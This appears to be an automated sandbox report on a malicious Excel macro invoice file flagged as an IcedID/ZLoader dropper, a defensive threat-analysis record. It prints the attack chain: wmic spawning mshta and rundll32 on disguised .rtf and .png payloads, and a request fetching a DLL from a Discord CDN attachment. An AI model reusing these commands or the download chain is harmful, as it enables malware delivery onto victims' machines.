Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 16, 2021, 9:53 a.m. | Sept. 16, 2021, 9:56 a.m. |
-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\INV.-54490_20210915.xlsm
1608-
WMIC.exe wmic process call create 'mshta C:\ProgramData\IwfJmKwj.rtf'
2212
-
-
-
-
WMIC.exe wmic process call create "rundll32.exe C:\\ProgramData\sbs_iehost.png JetCloseFile"
2972
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
cdn.discordapp.com | 162.159.135.233 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49174 -> 162.159.133.233:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49174 162.159.133.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET https://cdn.discordapp.com/attachments/887666439396421665/887666505632858112/9_SensorsApi.dll.dll |
description | mshta.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds |
file | C:\Users\test22\AppData\Local\Temp\~$INV.-54490_20210915.xlsm |
cmdline | wmic process call create "rundll32.exe C:\\ProgramData\sbs_iehost.png JetCloseFile" |
cmdline | wmic process call create 'mshta C:\ProgramData\IwfJmKwj.rtf' |
cmdline | mshta C:\\ProgramData\sbs_iehost.rtf |
cmdline | wmic process call create "rundll32.exe C:\\ProgramData\sbs_iehost.png JetCloseFile" |
cmdline | wmic process call create 'mshta C:\ProgramData\IwfJmKwj.rtf' |
Lionic | Trojan.Script.Generic.4!c |
CAT-QuickHeal | XLS4.IcedID.42146 |
Cyren | XLSM/Agent.YP.gen!Camelot |
Avast | SNH:Script [Dropper] |
Kaspersky | HEUR:Trojan.Script.Generic |
McAfee-GW-Edition | Artemis!Trojan |
ZoneAlarm | HEUR:Trojan-Downloader.MSOffice.ZLoader.gen |
Zoner | Probably Heur.W97ShellN |
Tencent | Trojan.Win32.XmlMacroSheet.11008470 |
Fortinet | MSExcel/Agent.9A7D!tr |
AVG | SNH:Script [Dropper] |
parent_process | excel.exe | martian_process | wmic process call create 'mshta C:\ProgramData\IwfJmKwj.rtf' |